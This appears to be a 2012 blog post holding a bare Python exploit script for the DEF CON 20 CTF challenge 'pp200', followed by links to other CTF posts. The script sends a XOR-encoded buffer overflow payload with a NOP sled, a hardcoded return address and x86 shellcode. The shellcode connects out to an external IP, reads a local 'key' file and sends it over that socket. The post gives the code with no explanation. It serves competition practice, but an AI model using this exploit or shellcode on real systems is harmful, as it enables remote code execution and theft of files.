defcon20 pp200 exploit
2012. 6. 16. 14:08
#!/usr/bin/python2.6
#defcon 2012, pp200 exploit - badcob
import socket, sys
from struct import pack
def make_connection(host,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
return s
#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"
host = "192.168.74.134"
port = 8912
num = "b74b9d86e6cd3480" + "\x0a"
user_id = "a6" + "\x0a"
ret = "\xbc\xe2\xbe\xbf"
#make payload
temp = "\x90"*416+scode+"\x90"*17+"\x0f"
temp += ret + "\x0a"
payload = ''
for x in temp:
a = ord(x)^0xa6
if a == 0xa:
print "failed"
break
payload += chr(a)
s = make_connection(host,port)
s.send(num)
print s.recv(128)
s.send(user_id)
print s.recv(128)
s.send(payload)
'CTF' 카테고리의 다른 글
| Holyshield 2010 Write up (2) | 2012.11.28 |
|---|---|
| JFF2 JH1 (2) | 2012.08.11 |
| jff2 silly100 (5) | 2012.08.06 |
| defcon20 bin200 (0) | 2012.06.22 |
| defcon20 pp400 exploit (0) | 2012.06.16 |
| defcon20 pp300 exploit (0) | 2012.06.16 |
| pctf 2012 format (0) | 2012.05.09 |
| Defcon 19 b500 writeup (0) | 2011.06.17 |
| ISEC 2010 level8 random array (0) | 2010.11.10 |